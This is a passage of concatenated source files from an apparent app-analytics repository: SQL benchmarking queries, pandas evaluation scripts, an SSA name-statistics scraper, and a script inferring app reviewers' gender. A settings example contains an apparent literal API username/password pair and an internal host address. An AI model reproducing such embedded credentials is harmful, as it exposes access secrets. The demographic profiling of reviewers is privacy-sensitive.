PRIMARY KEY (`store_id`, `date`, `app_id`, `feed`)
)
SELECT
d.application_id as app_id,
date,
fdtm.feed,
cnm.store_id,
d.real_value AS units
FROM
temp.application_data d
JOIN aa_benchmarking_android.feed_device_type_mappings fdtm
USING (type)
JOIN aa_benchmarking_android.country_mappings cnm
USING (country_id)
WHERE
real_value IS NOT NULL
AND type IN ('paid', 'free')
GROUP BY
d.date,
fdtm.feed,
cnm.store_id,
d.application_id;
DROP TEMPORARY TABLE IF EXISTS temp.sales_temp;
CREATE TEMPORARY TABLE temp.sales_temp(
app_id integer NOT NULL,
date date NOT NULL,
store_id integer NOT NULL,
feed INT NOT NULL,
revenue INT,
PRIMARY KEY (`store_id`, `date`, `app_id`, `feed`)
)
SELECT
d.application_id as app_id,
date,
cnm.store_id,
fdtm.feed,
d.real_value AS revenue
FROM
temp.application_data d
JOIN aa_benchmarking_android.feed_device_type_mappings fdtm
USING (type)
JOIN aa_benchmarking_android.country_mappings cnm
USING (country_id)
WHERE
real_value IS NOT NULL
AND type IN ('gross')
GROUP BY
d.date,
fdtm.feed,
cnm.store_id,
d.application_id;
-- Remove values already present for generated stores and days.
DELETE
r.*
FROM
aa_benchmarking_android.downloads r
JOIN temp.downloads_temp t
USING (store_id, date);
DELETE
r.*
FROM
aa_benchmarking_android.sales r
JOIN temp.sales_temp t
USING (store_id, date);
-- Insert new values.
INSERT INTO aa_benchmarking_android.downloads
SELECT
t.app_id,
t.date,
t.store_id,
t.feed,
t.units
FROM
temp.downloads_temp t;
INSERT INTO aa_benchmarking_android.sales
SELECT
t.app_id,
t.date,
t.store_id,
t.feed,
t.revenue
FROM
temp.sales_temp t;
<file_sep>/evaluation/py/get_daily_weights_quality.py
# Author: <NAME> <<EMAIL>>
import os
import sys
import pandas as pd
import numpy as np
from collections import defaultdict
def main():
input_dir = sys.argv[1]
output_dir = sys.argv[2]
args_num = len(sys.argv)
estreal_daily_sbe = sys.argv[1]
app_daily_weights = sys.argv[2]
output_dir = sys.argv[3]
input_files = _listdir_with_fullpath(estreal_daily_sbe) + _listdir_with_fullpath(app_daily_weights)
input_files = filter(lambda s: s.endswith('.csv'), input_files)
g = _group_same_filenames(input_files)
for (group_name, files) in g:
# They have to be pair.
if len(files) != 2:
continue
df = _merge_sbe_and_weights(map(pd.read_csv, files))
daily_quality = _get_daily_sbe_error(df)
daily_quality.rename(columns={'mean': 'daily_sbe_error_mean',
'median': 'daily_sbe_error_median'},
inplace=True)
daily_quality.to_csv(os.path.join(output_dir, group_name), index=False)
def _get_daily_sbe_error(df):
def daily_over20_error(x):
return np.sum(x > 0.2) / float(len(x))
df['daily_sbe_error'] = (df['estimate'] - df['units']).abs() / df['units'].astype(float)
df['daily_sbe_weighted_error'] = df['daily_sbe_error'] * df['daily_weights']
grouped_error = df.groupby('app_id')['daily_sbe_error'].aggregate([pd.Series.mean, daily_over20_error])
grouped_error.rename(columns={'mean': 'daily_sbe_error_mean',
'median': 'daily_sbe_error_median'},
inplace=True)
grouped_weighted_error = df.groupby('app_id')['daily_sbe_weighted_error'].aggregate([pd.Series.mean, daily_over20_error])
grouped_weighted_error.rename(columns={'mean': 'daily_sbe_error_mean',
'median': 'daily_sbe_error_median'},
inplace=True)
grouped = pd.merge(grouped_error, grouped_weighted_error, on=['app_id'], how='inner')
return grouped.reset_index()
def _listdir_with_fullpath(d):
return [os.path.join(d, i) for i in os.listdir(d)]
def _group_same_filenames(paths):
# Corresponding est and real values should have the same base name.
# Despite that they're in different dirs.
d = defaultdict(list)
for s in paths:
d[os.path.basename(s)].append(s)
return d.iteritems()
def _merge_sbe_and_weights(dfs):
# @note: Use inner join, because we only care the case where we have
# estimation and real values.
merged = pd.merge(*dfs, on=['app_id', 'date'], how='inner')
return merged.sort_index(by=['date'])
if __name__ == '__main__':
main()
<file_sep>/audience/name_vs_age_gender/lib/name_statistics.py
import glob
import numpy as np
import os
import pandas as pd
import requests
from bs4 import BeautifulSoup
COHORT_LIFE_TABLE_URL = "http://www.ssa.gov/oact/NOTES/as120/LifeTables_Tbl_7_{decade}.html"
AGE_BINS = ['14-17', '18-24', '25-34', '35-44', '45-54', '55+']
AGE_BOUNDARIES = np.array([14, 18, 25, 35, 45, 55, 100])
def download_birth_data():
"""
Download births data.
"""
os.system("wget http://www.ssa.gov/oact/babynames/names.zip -P data")
os.system("unzip data/names.zip -d data/")
def load_births(data_paths=None):
"""
Load births data.
:param data_paths: List with paths to yearly births files
:returns DataFrame with birth statistics
"""
if data_paths is None:
data_paths = glob.glob('data/*.txt')
births = pd.concat([_load_year_births(file_path) for file_path in data_paths])
births.sort(['year', 'gender', 'n_born'], ascending=[True, True, False],
inplace=True)
return births
def _load_year_births(file_path):
"""
Load births for a year.
:param file_path: Path to file to load
:return DataFrame with birth statistics a year
"""
year = file_path[8:12]
year_births = pd.read_csv(file_path, names=['name', 'gender', 'n_born'])
year_births['year'] = int(year)
return year_births
def get_survival_rates(year=2014, yearly_survival_rates=None):
"""
Get survival rates for ages in a given year.
:param year: Year
:param yearly_survival_rates: DataFrame with yearly survival rates
:returns DataFrame with survival rates
"""
if yearly_survival_rates is None:
yearly_survival_rates = get_yearly_survival_rates()
survival_rates = yearly_survival_rates[(yearly_survival_rates.year +
yearly_survival_rates.age) == year]
return survival_rates
def get_yearly_survival_rates(begin_decade=1920, end_decade=2020):
"""
Get yearly survival rates.
:param begin_decade: Begin decade
:param end_decade: End decade
:returns DataFrame with yearly survival rates
"""
decennial_survival = pd.concat([_get_decennial_survival_rates(decade)
for decade in np.arange(begin_decade,
end_decade + 10, 10)])
min_year = decennial_survival.decade.min()
max_year = decennial_survival.decade.max()
yearly_index = np.arange(min_year, max_year + 1)
yearly_survival = pd.concat([_resample_survival_rates(group, yearly_index) for key, group
in decennial_survival.groupby(['age', 'gender'])])
return yearly_survival
def _get_decennial_survival_rates(decade, cohort_life_table_url=COHORT_LIFE_TABLE_URL):
"""
Get survival rates for a given decade.
:param decade: Decade
:param cohort_life_table_url: URL to retrieve cohort table from
:returns DataFrame with survival rates of ages for a given decade
"""
table_url = cohort_life_table_url.format(decade=str(decade))
cohort_table = _download_cohort_table(table_url)
survival_rates = _process_cohort_table(cohort_table)
survival_rates['decade'] = float(decade)
return survival_rates
def _download_cohort_table(cohort_table_url):
"""
Download cohort table and convert to DataFrame.
:param cohort_table_url: URL to retrieve cohort table from
:returns DataFrame with cohort data
"""
soup = BeautifulSoup(requests.get(cohort_table_url).text)
raw_table = soup.findAll('table')[1]
raw_table = [[cell.getText().strip() for cell in row.findAll(['tr2', 'td'])]
for row in raw_table.findAll('tr') if len(row) > 0]
raw_table = [[cell if len(cell) > 0 else np.nan for cell in row]
for row in raw_table]
cohort_table = pd.DataFrame(raw_table)
return cohort_table
def _process_cohort_table(cohort_table, population_size=100000.):
"""
Process the cohort table and compute survival rates.
:param cohort_table: Downloaded cohort table
:param population_size: Population size used by SSA
:returns DataFrame with survival rates for given age and gender
"""
temp_df = cohort_table.dropna(axis=0, how='all').dropna(axis=1, how='all')[[0, 2, 10]]
temp_df.columns = ['age', 'M', 'F']
temp_df['age'] = temp_df.age.astype(float)
temp_df[['M', 'F']] = temp_df[['M', 'F']].applymap(lambda x: float(x.replace(',', '')))
survival = pd.melt(temp_df, id_vars=['age'], value_vars=['M', 'F'])
survival.rename(columns={'variable': 'gender', 'value': 'rate'},
inplace=True)
survival['rate'] = survival.rate / population_size
return survival
def _resample_survival_rates(decennial_survival, yearly_index):
"""
Generate resampled survival rates from decennial rates.
:param decennial_survival: DataFrame with decennial survival rates
:param yearly_index: Index to use for resampling
"""
reindexed_df = decennial_survival.set_index('decade').reindex(yearly_index)
resampled_df = reindexed_df.interpolate()
resampled_df['gender'] = decennial_survival.gender.iloc[0]
resampled_df.reset_index(inplace=True)
resampled_df.rename(columns={'decade': 'year'}, inplace=True)
return resampled_df
def combine_name_statistics(births, survival_rates):
"""
Combine births with survival rates.
:param births: Birth counts
:param survival_rates: Survival rates for a given year
:returns DataFrame with name statistics
"""
name_statistics = pd.merge(births, survival_rates, on=['gender', 'year'])
name_statistics['n_born_and_alive'] = np.round(name_statistics.rate * name_statistics.n_born)
name_statistics.sort(['gender', 'year', 'name'], inplace=True)
return name_statistics
def compute_binned_distributions(name_statistics, age_bins=AGE_BINS, age_boundaries=AGE_BOUNDARIES):
"""
Compute binned distributions for age and gender.
:param name_statistics: DataFrame with name statistics (see combine_name_statistics)
:param age_bins: Labels for age bins (parameter labels for pandas.cut)
:param age_boundaries: Boundaries for the age bins (parameter bins for pandas.cut)
:return: DataFrame with aggregated distributions for age and gender.
Note: Throws away any interactions between age and gender (i.e. information on age given gender and vice versa).
"""
name_statistics['age_bin'] = pd.cut(name_statistics['age'], bins=age_boundaries, right=False, labels=age_bins)
name_statistics = name_statistics[name_statistics.age_bin.notnull()]
gender = _compute_fraction_male(name_statistics)
age = _compute_age_distribution(name_statistics)
return pd.concat([gender['fraction_male'], age], axis=1)
def _compute_fraction_male(name_statistics):
"""
Compute the fraction of males for each name.
:param name_statistics: DataFrame with name statistics (see combine_name_statistics)
:return: DataFrame with fraction of males per name
"""
gender = pd.pivot_table(name_statistics, index='name', columns='gender', values='n_born_and_alive',
aggfunc=sum, fill_value=0)
gender['total'] = gender.sum(axis=1)
gender['fraction_male'] = gender.M * 1. / gender.total
return gender
def _compute_age_distribution(name_statistics):
"""
Compute the binned age distribution for each name.
:param name_statistics: DataFrame with name statistics (see combine_name_statistics)
:return: DataFrame with binned age distributions per name
"""
age = pd.pivot_table(name_statistics, index='name', columns='age_bin', values='n_born_and_alive',
aggfunc=sum, fill_value=0)
age['total'] = age.sum(axis=1)
age = age[age.total > 0]
age_bins = name_statistics.age_bin.unique()
for current_bin in age_bins:
age[current_bin] = age[current_bin] * 1. / age['total']
return age
<file_sep>/top-app-stability/Distimo_data_queries/Android_calculate_mapd.sql
DROP TABLE IF EXISTS temp.market_stability_mapd;
CREATE TABLE temp.market_stability_mapd
select
'android' as platform,
a.iso_code,
a.feed,
a.start_date,
CASE
WHEN a.rank = 1 THEN '1'
WHEN a.rank >=2 and a.rank <= 5 THEN '2-5'
WHEN a.rank >=6 and a.rank <= 15 THEN '6-15'
ELSE '16-50'
END as rank_bucket,
avg(abs((a.estimate - b.estimate) / b.estimate)) as mapd
from
aa_benchmarking_android.stability_weekly_aggregated a
join aa_benchmarking_android.stability_weekly_aggregated b on
a.feed = b.feed and a.start_date = date_add(b.start_date, interval 1 week) and a.rank = b.rank and a.iso_code = b.iso_code
group by
iso_code, feed, start_date, rank_bucket
;
insert into aa_benchmarking_ios.stability_mapd
select
*
from
temp.market_stability_mapd
;
<file_sep>/top-app-stability/Distimo_data_queries/iOS_estimates_per_week.sql
DROP TEMPORARY TABLE IF EXISTS temp.weeks;
CREATE TEMPORARY TABLE temp.weeks
(CONSTRAINT PRIMARY KEY (date, start_date))
SELECT
adddate(date, INTERVAL 1 DAY) as date,
adddate(date, INTERVAL 1-DAYOFWEEK(date) DAY) as start_date
FROM
estimates.application_data_appstore
WHERE
date >= '2014-09-28' and date <= '2014-10-04'
GROUP BY date;
DROP temporary table IF EXISTS temp.ios_top_est;
CREATE temporary TABLE temp.ios_top_est
(CONSTRAINT PRIMARY KEY (start_date,iso_code,feed,rank))
SELECT
start_date,
cn.iso_code,
CONCAT(IF(ai.device_id=1, 'iphone_', 'ipad_'), IF(x1.type='gross','revenue',x1.type)) as feed,
rank,
estimate
FROM (
SELECT
start_date,
appstore_instance_id,
type,
estimate,
IF(
(@prev=CONCAT('1','-',x.start_date,'-',x.appstore_instance_id,'-',x.type)),
@rank:=@rank+1,
((@prev:=CONCAT('1','-',x.start_date,'-',x.appstore_instance_id,'-',x.type)) AND (@rank:=1))
) AS rank
FROM(
SELECT
w.start_date,
e.appstore_instance_id,
e.application_id,
e.type,
sum(e.estimate) as estimate
FROM
estimates.application_data_appstore e
JOIN temp.weeks w
ON w.date = e.date
GROUP BY w.start_date, appstore_instance_id,application_id, type
ORDER BY w.start_date, appstore_instance_id, type, estimate DESC
) x, (SELECT @rank:=1, @prev:='') dummy
) x1
JOIN appstore.appstore_instances ai
ON ai.id = x1.appstore_instance_id
JOIN appstore.countries cn
ON cn.id = ai.country_id
WHERE rank <= 50;
INSERT INTO aa_benchmarking_ios.stability_weekly_aggregated
select
*
from
temp.ios_top_est;
<file_sep>/aa_au_model/hive_scripts/workflow/conf/settings_example.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
TEST = False
ENV = 'staging'
AMR_SERVICE_ADDRESS = 'xxx'
HDFS_MNT_PREFIX = '/mnt/hdfs'
HDFS_ROOT_PATH = '/user/aardvark'
HBASE_THRIFT_HOST = 'localhost'
STREAMING_JAR = '/usr/lib/hadoop-0.20-mapreduce/contrib/streaming/hadoop-streaming-2.0.0-mr1-cdh4.5.0.jar'
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
EMR_KEY_PAIR_FILE = '/home/aardvark/id_rsa_emr.pem'
PG_DB_USER = 'aa'
PG_DB_PASSWD = ''
PG_DB_HOST = 'localhost'
PG_DB_PORT = 5432
PG_DB_NAME_A = 'aa'
PG_DB_NAME_B = 'bb'
KPI_PG_DB_USER = 'aa'
KPI_PG_DB_PASSWD = ''
KPI_PG_DB_HOST = 'localhost'
KPI_PG_DB_PORT = 5432
KPI_PG_DB_NAME = 'aa'
APPANNIE_API_KEY = 'XXXXX'
WORKFLOW_LOG_PATH = ''
VPN_RADIUS_DB_HOST = 'localhost'
VPN_RADIUS_DB_PORT = 5432
VPN_RADIUS_DB_USER = 'root'
VPN_RADIUS_DB_PWD = '<PASSWORD>'
VPN_RADIUS_DB_USERINFO = 'radius'
API_HOST = 'https://report-stg.smart-sense.org'
API_AUTH = ('a8k', 'a8k4u')
AWS_ACCESS_KEY_ID = ''
AWS_SECRET_ACCESS_KEY = ''
S3_BIG_UPLOAD_BUCKET = ''
ZK_HOST = ''
ZK_PORT = ''
VPN_DEVICE_INFO_DB_HOST = ''
VPN_DEVICE_INFO_DB_PORT = 5432
VPN_DEVICE_INFO_DB_USER = ''
VPN_DEVICE_INFO_DB_PWD = ''
VPN_DEVICE_INFO_DB_USERINFO = ''
VPN_LOGIN_INFO_DB_HOST = ''
VPN_LOGIN_INFO_DB_PORT = 5432
VPN_LOGIN_INFO_DB_USER = ''
VPN_LOGIN_INFO_DB_PWD = ''
VPN_LOGIN_INFO_DB_USERINFO = ''
VPN_STATS_DB_HOST = ''
VPN_STATS_DB_PORT = 5432
VPN_STATS_DB_USER = ''
VPN_STATS_DB_PWD = ''
VPN_STATS_DB_USERINFO = ''
DPI_RESULT_S3_BUCKET = 'aardvark-stg-ds-sample'
DPI_RESULT_S3_ACCESS_KEY = 'XXXX'
DPI_RESULT_S3_SECRET_KEY = 'XXX'
DATA_S3_BUCKET = 'aardvark-stg-data'
DATA_INT_S3_BUCKET = ''
VPN_SOURCE_S3_BUCKET = ''
INT_ETL_NOTIFY_SQS_QUEUE_NAME = ''
INT_ETL_NOTIFY_ACCESS_KEY = ''
INT_ETL_NOTIFY_SECRET_KEY = ''
INT_ETL_NOTIFY_REGION = ''
USER_NAME_FOR_OPEN_TSDB = ''
PWD_FOR_OPEN_TSDB = ''
URL_FOR_OPEN_TSDB_GET = ''
URL_FOR_OPEN_TSDB_POST = ''
APP_ANNIE_IP_SERVICE = 'http://internal-prod-serv-elb-1907643352.us-west-2.elb.amazonaws.com/2015-01-30/'
ADX_CONFIG = {'username': 'username', 'password': '<PASSWORD>', 'host': 'host', 'parse_networks': [], 'IGNORE_CREATIVES':
[]}<file_sep>/audience/legacy_experiments/model_v1_ios.py
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
from nltk.corpus import wordnet
from collections import defaultdict
from nltk import NaiveBayesClassifier
from nltk.tokenize import wordpunct_tokenize
import pandas as pd
import nltk
import numpy as np
from unidecode import unidecode
import random
import re
from nltk.corpus import stopwords
import collections
import psycopg2
import argparse
from guess_language import guess_language
import cStringIO
import StringIO
import os
import sys
SEP = '\t'
DATA_DIR = '/home/rafael/appannie/data/demie'
def guess_lang(text):
try:
return guess_language(text.decode('utf-8'))
except:
return 'UNKNOWN'
def r(df):
for idx, row in df.iterrows():
yield SEP.join(map(str, row))
def get_p_male_from_name(reviewer, name_gender_classifier, clean_name_set):
tokens = str(reviewer).strip()
tokens = unidecode(tokens.decode('utf-8', 'replace'))
pattern2 = r'''\s|[A-Z][a-z]*|[a-z]*|[+/\-@&*_]'''
tokens = nltk.regexp_tokenize(tokens, pattern2)
tokens = [element.lower() for element in tokens]
tokens = set(tokens)
tokens = tokens.intersection(clean_name_set)
p_male_by_name = -1.0
if len(tokens)>0:
p_male_by_name = get_male_probability_byName(tokens, name_gender_classifier)
p_male_by_name = get_highest_probability(p_male_by_name)
return p_male_by_name
def read_reviews(store_id, cur):
sql = 'SELECT reviewer, text, title FROM aa_review WHERE reviewer!=%s AND store_id=%s ORDER BY reviewer limit 10001'
params = ('', store_id)
print cur.mogrify(sql, params)
cur.execute(sql, params)
print cur.mogrify(sql, params)
for reviewer, text, title in cur:
yield {'reviewer': reviewer, 'review': '. '.join((title, text))}
def get_highest_probability(prob_set):
highest_p = 0.5
highest_item = np.nan
for p in prob_set:
if ((p >= 0.5) & (p >= highest_p)):
highest_p = p
highest_item = p
if ((p < 0.5) & ((1-p) > highest_p)):
highest_p = 1-p
highest_item = p
return highest_item
def name_features(word):
featdict = {}
#print word
featdict['full'] = word
featdict['length'] = len(word)
for i in range(1,5):
featdict['last_%s'%i] = word[-i:]
return featdict
def get_male_probability_byName(tokens, gender_classifier):
p_gender = []
for word in tokens:
p_gender.append(gender_classifier.prob_classify(name_features(word)).prob('male'))
p_gender = np.array(p_gender)
return p_gender
def text_features(text, ex_word_set):
#print text
#clean_text = text.encode('utf-8')
clean_text = unidecode(text.decode('utf-8', errors='ignore'))
clean_text = re.sub('3D', '', clean_text)
clean_text = re.sub('<(.|\n)*?>', '', clean_text)
clean_text = re.sub('&\w+;', '', clean_text)
clean_text = clean_text.replace('\n', '').lower()
tokens = wordpunct_tokenize(clean_text)
#tokens = tokens.apply(lambda x: [w for w in x if re.search('[a-zA-Z]', w) and len(w) > 1])
tokens = set(tokens)
tokens = tokens.difference(ex_word_set)
features = defaultdict(list)
for t in tokens:
features[t] = True
return features
def get_male_probability_byText(text, ex_word_set, classifier):
features = text_features(text, ex_word_set)
return classifier.prob_classify(features).prob('M')
# <codecell>
def main():
parser = argparse.ArgumentParser(description='Predict the male probability of a text in db and put it int p_male for that database')
parser.add_argument('-t','--table', help='Table name in db', required=True)
parser.add_argument('-f','--field', help='Column name with the text we want to predict language', required=True)
parser.add_argument('-s','--store_id', help='Store ID', type=int, required=True)
parser.add_argument('-c','--connection', help='Connection string to pass to postgres', required=True)
args = vars(parser.parse_args())
#CONN=psycopg2.connect('dbname=aa_reviews_android user=aa host=10.38.48.144 port=5432')
df_obs = pd.read_csv('%s/143441.csv'%DATA_DIR, error_bad_lines=False)
df_benchmark = pd.read_csv('%s/benchmark_name.csv'%DATA_DIR)
df_benchmark = df_benchmark.dropna()
clean_name_set = set(df_benchmark['clean_name'].dropna())
remove_set = set(['in', 'my', 'fan', 'king', 'art', 'man', 'love', 'guy', 'rose', 'soon', 'cookie', 'mac', 'jc', 'happy',
'case', 'bear', 'sun', 'don', 'pa', 'queen', 'delta', 'ma', 'le', 'em', 'star', 'er'])
for i in clean_name_set:
if len(i) < 4:
remove_set.add(i)
for i in clean_name_set:
if wordnet.synsets(i):
remove_set.add(i)
for i in remove_set:
clean_name_set.discard(i)
df_obs.columns = ['app_id', 'date', 'title', 'text', 'reviewer']
df_obs['reviewer'] = df_obs['reviewer'].astype(str)
df_obs['reviewer'] = df_obs['reviewer'].apply(lambda x: x.strip())
df_obs.dropna()
df_obs.drop_duplicates()
df_obs['reviewer'] = df_obs['reviewer'].apply(lambda x: unidecode(x.decode('utf-8', "replace")))
pattern2 = r'''\s|[A-Z][a-z]*|[a-z]*|[+/\-@&*_]'''
df_obs['token'] = df_obs['reviewer'].apply(lambda x: nltk.regexp_tokenize(x, pattern2))
for i in range(len(df_obs['token'])):
#df_obs['token_l'][i] = set()
df_obs['token'][i] = [element.lower() for element in df_obs['token'][i]]
df_obs['token'] = df_obs['token'].apply(lambda x: set(x))
df_obs['token'] = df_obs['token'].apply(lambda x: x.intersection(clean_name_set))
df_train = df_obs[df_obs['token'].apply(lambda x: len(x) <> 0)]
# <codecell>
###################
names = [(n, 'female') for n in df_benchmark['clean_name'][df_benchmark['is_male']==0]]
names += [(n, 'male') for n in df_benchmark['clean_name'][df_benchmark['is_male']==1]]
random.shuffle(names)
gender_trainset_feat = [(name_features(n), g) for (n,g) in names]
name_gender_classifier = nltk.NaiveBayesClassifier.train(gender_trainset_feat)
######################
# <codecell>
df_train['r'] = df_train['token'].apply(lambda x: get_male_probability_byName(x, name_gender_classifier))
df_train['r_highest'] = df_train['r'].apply(lambda x: get_highest_probability(x))
df_train['gender'] = 'U'
df_train['gender'][df_train['r_highest'] >= 0.90] = 'M'
df_train['gender'][df_train['r_highest'] <= 0.01] = 'F'
df_train = df_train[df_train['gender'] <> 'U']
df_train.values
sw = stopwords.words('english')
sw.extend(['ll', 've'])
# <codecell>
features_labels = []
for row in df_train.iterrows():
try:
features = text_features(row[1]['text'], sw)
features_labels.append((features, row[1]['gender']))
except:
continue
text_gender_classifier = NaiveBayesClassifier.train(features_labels)
text_gender_classifier.show_most_informative_features(20)
# <codecell>
conn1 = psycopg2.connect(args['connection'])
cur1 = conn1.cursor()
conn2 = psycopg2.connect(args['connection'])
cur2 = conn2.cursor()
conn3 = psycopg2.connect(args['connection'])
cur3 = conn3.cursor()
table = args['table']
column = args['field']
store_id = args['store_id']
if column=='reviewer':
query1 = 'SELECT reviewer, store_id, p_male_from_name, p_male_from_reviews, p_language_from_reviews FROM %s WHERE store_id=%%s and (p_male_from_reviews=%%s or p_male_from_name=%%s)'%(table)
sql3 = 'select title, text from aa_review where store_id=%s'
params1 = (store_id, -1.0, -1.0)
else:
query1 = 'SELECT %s, id FROM %s WHERE p_male=%%s and (p_language=%%s or p_language=%%s)'%(column, table)
params1 = (-1.0, 'UNKNOWN', 'en')
truncate = True
if truncate:
cur1.execute('truncate %s'%table)
cur1.execute('alter table %s drop constraint if exists reviewer_p_pkey'%table)
cur1.execute('drop index if exists reviewer_p_p_language_from_reviews1')
cur1.execute('drop index if exists reviewer_p_p_male_from_name1')
cur1.execute('drop index if exists reviewer_p_p_male_from_reviews1')
conn1.commit()
sql = 'SELECT reviewer_id, reviewer, text, title FROM aa_review WHERE reviewer!=%s AND store_id=%s ORDER BY reviewer limit 10050'
params = ('', store_id)
print cur1.mogrify(sql, params)
cur1.execute(sql, params)
batch_size = 1000
rev_list = []
for reviewer_id, reviewer, text, title in cur1:
rev_list.append({'reviewer_id': reviewer_id, 'reviewer': reviewer, 'review': '. '.join((title, text))})
if len(rev_list)>=batch_size:
reviews_df = pd.DataFrame(rev_list)
print 'Doing operations up to %s'%len(rev_list)
rev_list = []
reviews_df = reviews_df.groupby('reviewer_id')['review'].apply(lambda x: '. '.join(x)).reset_index()
reviews_df.rename(columns={0:'review'}, inplace=True)
#print reviews_df
reviews_df['p_language_from_reviews'] = '-'
reviews_df['p_language_from_reviews'] = reviews_df['review'].apply(lambda x: guess_lang(x))
reviews_df['p_male_from_reviews'] = -1.0
reviews_df['p_male_from_name'] = -1.0
reviews_df['p_male_from_reviews'][reviews_df['p_language_from_reviews']=='en'] = reviews_df['review'].apply(lambda x: get_male_probability_byText(x, sw, text_gender_classifier))
reviews_df['p_male_from_name'][reviews_df['p_language_from_reviews']=='en'] = reviews_df['reviewer'].apply(lambda x: get_p_male_from_name(x, name_gender_classifier, clean_name_set))
reviews_df['store_id'] = store_id
reviews_df = reviews_df[['reviewer_id', 'store_id', 'p_male_from_name', 'p_male_from_reviews', 'p_language_from_reviews']]
reviews_df = '\n'.join(r(reviews_df))
print 'Copying to back to table'
reviews_df = StringIO.StringIO(reviews_df)
cur2.copy_from(reviews_df, table, columns=('reviewer_id', 'store_id', 'p_male_from_name', 'p_male_from_reviews', 'p_language_from_reviews'))
conn2.commit()
if len(rev_list)>0:
reviews_df = pd.DataFrame(rev_list)
print 'Doing operations up to %s'%len(rev_list)
rev_list = []
reviews_df = reviews_df.groupby('reviewer_id')['review'].apply(lambda x: '. '.join(x)).reset_index()
reviews_df.rename(columns={0:'review'}, inplace=True)
reviews_df['p_language_from_reviews'] = '-'
reviews_df['p_language_from_reviews'] = reviews_df['review'].apply(lambda x: guess_lang(x))
reviews_df['p_male_from_reviews'] = -1.0
reviews_df['p_male_from_name'] = -1.0
reviews_df['p_male_from_reviews'][reviews_df['p_language_from_reviews']=='en'] = reviews_df['review'].apply(lambda x: get_male_probability_byText(x, sw, text_gender_classifier))
reviews_df['p_male_from_name'][reviews_df['p_language_from_reviews']=='en'] = reviews_df['reviewer'].apply(lambda x: get_p_male_from_name(x, name_gender_classifier, clean_name_set))
reviews_df['store_id'] = store_id
reviews_df = reviews_df[['reviewer_id', 'store_id', 'p_male_from_name', 'p_male_from_reviews', 'p_language_from_reviews']]
reviews_df = '\n'.join(r(reviews_df))
print 'Copying to back to table'
reviews_df = StringIO.StringIO(reviews_df)
cur2.copy_from(reviews_df, table, columns=('reviewer_id', 'store_id', 'p_male_from_name', 'p_male_from_reviews', 'p_language_from_reviews'))
conn2.commit()
print 'Making indexes'
cur2.execute('alter table %s add primary key (reviewer, store_id)'%table)
cur2.execute('create index reviewer_p_p_language_from_reviews1 on %s using btree (p_language_from_reviews)'%table)
cur2.execute('create index reviewer_p_p_male_from_name1 on %s using btree (p_male_from_name)'%table)
cur2.execute('create index reviewer_p_p_male_from_reviews1 on %s using btree (p_male_from_reviews)'%table)
conn2.commit()
conn1.close()
conn2.close()
conn3.close
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/sql/0-settings-ios.sql
-- VERSION --
SET @version = 7;
-- TIME SETTINGS --
-- SET A SATUREDAY AS @date
SET @date=20140621;
SET @run_timestamp = CURRENT_TIMESTAMP(3);
-- STORED PROCEDURES AND ESTIMATES DB
USE estimates_dev;
SET @current_db = DATABASE();
SET @current_user = SUBSTRING(USER(),1,LOCATE('@',USER())-1);
-- HOUR LINKING PENALTY --
SET @penalty = 0.05;
SET @hour_width = 2;
-- COUNTRIES --
SET @countries = 'US,NL';
-- EXCLUDE APPS FROM ESTIMATION --
SET @exclude_application_ids = '';
-- DAY WEIGHTS --
-- in this table you can set the days to calculate the weighted average of the downloads/revenues that are taken into account in the ranking algorithm
-- note that the max. number of day weights is 10
SET @day_weights = '1,1,1,1,1,1,1';
-- SET TABLE NAMES ---
SET @application_data_appstore_table = CONCAT(@current_db,'.application_data_appstore');
SET @used_rankings_appstore_table = CONCAT(@current_db,'.used_rankings_appstore');
SET @estimation_appstore_table = CONCAT(@current_db,'.new_estimation_appstore');
SET @best_estimations_appstore_table = CONCAT(@current_db,'.best_estimations_appstore');
-- Option to reset all countries in insert tables (instead of only countries
-- that are rerun).
SET @reset_tables_for_all_countries = 0;
-- SYNCING BEST-ESTIMATION TABLES --
-- set to 1 for syncing estimates_dev.best_estimations_appstore with estimates.best_estimations_appstore
SET @sync_estimates_dev_best_estimations = 0;
-- GENERAL REGRESSION PARAMETERS --
SET @regression_b2_max = 20;
SET @regression_b2_stepsize = 1;
-- FORCE RANKING TIMES --
-- forcing a ranking time per country eg.: 'GB=01:00:00,DE=02:00:00,...'
-- using the @penalty parameter to punish algorithm for deviation
SET @force_ranking_times = '';
-- BEST ESTIMATIONS LOCK TIME OUT --
-- set how long the algorithm waits for the best estimations lock before
-- erroring
SET @lock_best_estimations_table = IF(@current_db = 'estimates', 1, 0);
SET @best_estimations_lock_name = CONCAT(@current_db, '_appstore_best_estimations_lock');
SET @best_estimations_lock_time_out = 1800;
-- COUNTRY QUALITY SETTINGS FOR REPORTING --
-- set the country quality; this is only used
-- for the data checks
SET @low_quality_countries = 'FI,SA,VE,PE,UY,AZ,BY,BG,KH,CR,HR,CZ,EC,EG,GR,GT,HU,KZ,KW,LV,LB,LU,MO,NG,PL,PT,RO,SK,UA';
<file_sep>/sbe_benchmark/sumarize.py
import pandas as pd
import os
PERIOD = '2013-07'
DATA_DIR = '/Users/perezrafael/appannie/data_science/sbe_benchmark/data'
MARKET_SIZE = '/Users/perezrafael/appannie/data/market_size_%s.csv'%PERIOD
MARKET_TYPE_DICT = {'Free': 'Downloads',
'Paid': 'Downloads',
'Grossing w/ IAP': 'Revenue',
'Grossing w/o IAP': 'Revenue',
}
UNIT_DICT = {'Downloads': 'Downloads',
'USD': 'Revenue'}
RANGE_WEIGHT_DICT = {'1 to 10': 1.0,
'11 to 20': 0.9,
'21 to 200': 0.5,
'201 to end': 0.1}
def process_df(df):
df = df[df['index']=='best_case']
df = df.groupby(['store_id', 'feed_id', 'category_id', 'range']).sum().reset_index()
return df
def process_market_size(df):
df = df[df['Store']=='iOS']
df['category_id'] = df['Category'].apply(lambda x: x.replace('Games ', ''))
df['feed_id'] = df['Unit'].apply(lambda x: UNIT_DICT[x])
df['store_id'] = df['Country']
df = df.groupby(['store_id', 'category_id', 'feed_id', 'Period', 'Version', 'Value Type', 'Store']).sum().reset_index()
df.rename(columns={'Value':'market_size'}, inplace=True)
return df
def main():
market_size_df = pd.read_csv(MARKET_SIZE)
market_size_df = process_market_size(market_size_df)
models = ['webui', '7-days', 'monthly']
result= []
for root, dirs, files in os.walk(DATA_DIR):
for file in files:
f = file.split('_')
if file.endswith(".csv") and 'summary_full' in file:
filepath = os.path.join(root, file)
df = pd.read_csv(filepath)
